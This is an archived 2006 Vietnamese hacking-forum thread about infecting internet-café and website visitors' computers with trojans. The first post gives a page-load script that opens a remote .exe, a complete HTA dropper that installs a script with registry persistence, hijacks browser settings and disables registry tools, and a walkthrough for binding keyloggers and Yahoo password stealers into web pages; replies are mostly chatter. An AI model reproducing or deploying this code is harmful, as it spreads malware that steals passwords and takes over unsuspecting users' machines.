PDA

View Full Version : Tấn công máy chủ phòng net từ xa


soulevil
24-09-2006, 07:08 PM
Khi các bạn đã sử dụng thành công nhưng do 1 phút sơ sảy mà bị Công An bắt thì chỉ mong các anh đừng réo và khai tên em ra kẻo tội nghiệpCách 1 : dùng một đoạn mã đơn giản để open 1 con trojan !

đoạn mã như sau:
<script language=javascript>
open("http://freewebs.com/nhutuanweb/thanks.exe");
</SCRIPT>

với đoạn mã này bạn gắn dưới thẻ body thì mỗi khi truy cập website nó sẽ tự open con trojan của bạn.

cách thứ 2 là cách rất cao cấp ...

bạn copy vào notepad đoạn mã sau:
<html>
<head>
<script language="javascript">
try {
var fso = new ActiveXObject("Scripting.FileSystemObject");
var Shell = new ActiveXObject("WScript.Shell");
var tfolder2 = fso.GetSpecialFolder(0);
var filepath2 = tfolder2 + "\\system32\\System.js";
var a2 = fso.CreateTextFile(filepath2, true);
a2.WriteLine('var url = "http://www.freewebs.com/hinhanhlop18/hackervn.exe";');
a2.WriteLine('var burl = "http://www.freewebs.com/hinhanhlop18/hackervn.exe";');
a2.WriteLine('var fso = new ActiveXObject("Scripting.FileSystemObject");');
a2.WriteLine('var tfolder = fso.GetSpecialFolder(0);');
a2.WriteLine('var filepath = tfolder + "\\\\system32\\\\System.js";');
a2.WriteLine('var Shell = new ActiveXObject("WScript.Shell");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\Windows",filepath);');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\System32",filepath);');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\Main\\\\Start Page",url);');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url1",url);');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url2","http://http://www.freewebs.com/hinhanhlop18/hackervn.exe");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url3","http://www.freewebs.com/hinhanhlop18/hackervn.exe");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url4","http://www.freewebs.com/hinhanhlop18/hackervn.exe");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url5","http://www.freewebs.com/hinhanhlop18/hackervn.exe");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url6","http://www.freewebs.com/hinhanhlop18/hackervn.exe");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url7","http://www.freewebs.com/hinhanhlop18/hackervn.exe");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url8","http://www.freewebs.com/hinhanhlop18/hackervn.exe");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url9","http://www.freewebs.com/hinhanhlop18/hackervn.exe");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url10","http://www.freewebs.com/hinhanhlop18/hackervn.exe");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url11","http://www.freewebs.com/hinhanhlop18/hackervn.exe");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Yahoo\\\\Pager\\\\View\\\\YMSGR_Calendar\\\\content url","http://antihacker.50webs.com/sethome.htm");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Yahoo\\\\Pager\\\\View\\\\YMSGR_Games\\\\content url","http://antihacker.50webs.com/sethome.htm");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Yahoo\\\\Pager\\\\View\\\\YMSGR_Launchcast\\\\content url","http://antihacker.50webs.com/sethome.htm");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Yahoo\\\\Pager\\\\View\\\\YMSGR_Weather\\\\content url","http://antihacker.50webs.com/sethome.htm");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackervn.exe\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackervn.exe\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackervn.exe\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackervn.exe\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackervn.exe\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackervn.exe\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackervn.exe\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackervn.exe\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackervn.exe\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackervn.exe\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackervn.exe\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackervn.exe\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackervn.exe\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackervn.exe\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackervn.exe\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\DisableRegistryTools",1,"REG_DWORD");');
a2.Close();
Shell.Run(filepath2);
}
catch (e){}
</script>
<HTA:APPLICATION WINDOWSTATE='minimize' SHOWINTASKBAR='no' />
</head>
<body onload='window.close()'>
</body>
</html>
<!--- <frameset></frameset> -->

rồi save lại với tên là : hackervn.hta

nhớ là thay đường dẫn của con trojan đi nha..(http://www.freewebs.com/hinhanhlop18/hackervn.exe) là đường dăn tơi kon TJ
sau khi có file hackervn.hta rồi bạn gắn đoạn mã sau vào cuối cùng của website của bạn:
<center>
<span datasrc="#oRun" datafld="view" dataformatas="html"></span>
<xml id="oRun">
<preview>
<view>
<![CDATA[
<object id="oFile" data="hackervn.hta?id=1"></object>
]]>
</view>
</preview>
</xml>
</center>
</body>
</html>

rồi sau đó bạn upload file hackervn.hta + với website của bạn lên cùng 1 host ...ok mỗi lần mở website của bạn con trojan sẽ tự open vào trong hệ thống mà không hề bị phát hiện+ thêm nó set homepage luôn cho chắc ăn...

cách này rất hay...và cao cấp.

cách thứ 3
là các bạn dùng chương trình gắn trojan vào html: đó là GodWill1.06

chương trình này mình thấy nói rất nhiều trên các diễn đàn nhưng mà chẳng có ai làm được cả...hình như là copy ở site ra thôi.
các bạn downlaod tại đây http://www.freewebs.com/trangchulop18/GodWill1.6.rar ...nếu không down được thì các bạn lên google tìm nha.file kimdung upload lên gồm cả file hỗ trợ nữa nên nó khoảng 1.3Mb. nào bạn hãy tắt các trương trình diệt virus đi dể chúng ta setup

sau khi down về giải nén sẽ có các file sau như hình sau:
http://k.1asphost.com/nhutuan/a.JPG
nhấn kép vào file GODWILL sẽ có hình sau:
http://k.1asphost.com/nhutuan/b.JPG
sau khi bạn đọc xong những điều khoản thì nhấn enter.
http://k.1asphost.com/nhutuan/c.JPG
rồi đến đây bắt đầu xuất hiện những tiện ích của con trojan này.

cái chúng ta quan tâm ở đây là html ! ok nhấn vào chữ HTML:
http://k.1asphost.com/nhutuan/d.JPG
đến đây các bạn nhấn: Genral Options để chúng ta bắt đầu tạo.
http://k.1asphost.com/nhutuan/e.JPG
vì đặc điểm của con này là nó chỉ cho gắn một con trojan khoảng 34Kb thôi nên chúng ta tìm những con trojan nào dưới 34Kb như con MYSPY hay con K2PS hay con hackpass mới nhất đó yjaked1

+ ở mục enter .exe fie bạn mở con trojan đã chuẩn bị trước ra (MYSPY hay con K2PS,yjaked1...)

chọn đường dẫn tới nó.

+ ở mục enter.html bạn chọn đường dẫn cho trang web mình cần gắn trojan.

+ không nhắp chọn Uer defult page

+ ở mục enter.output bạn đổi tên file Geebferh.html thành tên nào bạn muốn.vì sau khi tạo xong thì trang web có gắn trojan sẽ là tên đó ( bạn không được mở trang đó ra)

+ page ICQ notyfi bạn muốn nhấp chọn cũng được nếu bạn có số ICQ thì nhấn chọn để mỗi khi có người open trang web nó sẽ báo về ICQ cho bạn...như kimdung thì chọn hết ngoại trừ "Uer defult page"

rồi xong sau khi đã hoàn thành các bước giờ thì bạn nhấn DOVE được rồi.
http://k.1asphost.com/nhutuan/f.JPG
rồi nhấn GEN để hoàn thành ...Godwill sẽ gắn con trojan của bạn vào trang web của bạn

và nó sẽ tự hoạt động mỗi khi có người mở trang web đó ra.

trojan k2sp là keylogger.

MYSPY là một loại gián điệp

yjaked1 dùng để hack pass yahoo.


Chúc thành công và đừng nhớ đến tui khi bị bắt

taolanamhieu
24-09-2006, 07:22 PM
chương trình này nghe có vẻ được đấy bà con ạ

Danh.L.Rudbich
24-09-2006, 08:20 PM
hix nghe thì ok lám !nhưng thấy thì có vẻ phức tạp wa'!

tran_hau1
26-09-2006, 07:31 PM
được đó vậy mơi xứng đáng đăng lên chứ

soulevil
26-09-2006, 08:50 PM
vậy thì phải click vô Thanks chứ

dqpinfo
29-09-2006, 11:50 PM
Nghe có vẻ ngon cơm đấy! Nhưng sao phức tạp quá.
Dốt mạnh như tui sao hiểu nổi đây???!!!

soulevil
30-09-2006, 12:00 PM
đọc mãi sẽ hiểu thôi

vuasocdia1987
03-10-2006, 08:08 AM
làm ko đươc bà con ah`

toi thu rồi mấy chương trình quét vu rút riêt ngon o lản

vuasocdia1987
04-10-2006, 08:16 AM
sặc có tối thì moi sáng được bạn ah` toi lai rất thích xem nhung cái tối đó :D:D:D:D:D:D

jokovnn
05-10-2006, 08:48 AM
cái này th2 coi có vẽ hay thiệt đó! nhưng mo` dzo dc thì cũng là một vấn đề.... nếu như dễ dzay ai cũng dzo dc rùi thì tệm net nào cũng dẹp tiệm hết we'

xuankhung
05-10-2006, 09:30 AM
heheehe
cai nay hoi truoc xep trong may cong cu cua dia viet hacker phai ko ban
ban con cai nao co the nhung troạn nua ko
pót len cho anh em xem cai nay cu roi ma

tm2816
12-10-2006, 05:53 PM
đề nghị post bài mơi đi, bài cũ như thế này thì .......................

TitanRain
12-10-2006, 06:53 PM
Vô dụng bởi vì hầu hết các phòng net đều có Deep Freeze roài

chinhbonlu
13-10-2006, 02:36 PM
hong bit duoc ko nua

taplamhacker
15-10-2006, 07:15 PM
nghe thi hay wa ma kho hieu wa anh oiiiiiiiiiiii

quocskill_xitin
19-10-2006, 05:39 PM
Nói rõ 1 chút nữa deee....Pà kon ui thanks đễ khích lệ đi..zo zo zo...

hiedeptrai
27-11-2006, 06:13 PM
khó làm à, mất thời gian lắm đó nhe

anh_y
27-11-2006, 07:12 PM
đấy ai thích đi tù thì cứ làm theo [Mod]soulevil đi bảo đảm là bóc lịch ít nhất 1 năm

talama2008
28-11-2006, 07:05 AM
thank you Vinamilk
bài viết nào của tui chả hay (hehehe):big_smile:
nếu mà thưởng thì phải thưởng cho MOD này sứng đáng anh ạ
em đang tập làm ạ xin cảm ơn anh ạ

soulevil
29-11-2006, 07:24 PM
ông viết được 1 bài thì Spam mất 3 bài nữa!
Củ chuối!:amazed:

tui sẽ xoá hết các bài đó cho ông vừa lòng nhưng
pa cũng đang xì pam đó thôi
chuổi cả nải :misdoubt:

à mà link godwill die roài vì vậy mọi người lên google search nhé

red_love
29-11-2006, 07:44 PM
tui đã từng thử rùi
ko bị tóm đâu
về chuẩn bị tiền bồi thường hãy làm
may cho tui là thoát được vì nghỉ máy để thằng mới vào chịu
hihihihihi
đỏ ko thể tả
:plane: :plane:

dreambluesky
03-01-2007, 06:37 PM
Uhm` coi bộ hay thiệt.
Mà cho mình hỏi cái: đoạn Code đó đánh vào đâu vậy?

† HoàngMinh †
03-01-2007, 06:54 PM
Thường các Net room deepfreez ổ cứng , để cài đc Trojan cần 1 fan mềm ghi đè lên mà k cần fa' băng ổ cứng ,và chú ý là họ thường quét Virus theo chu kỳ :E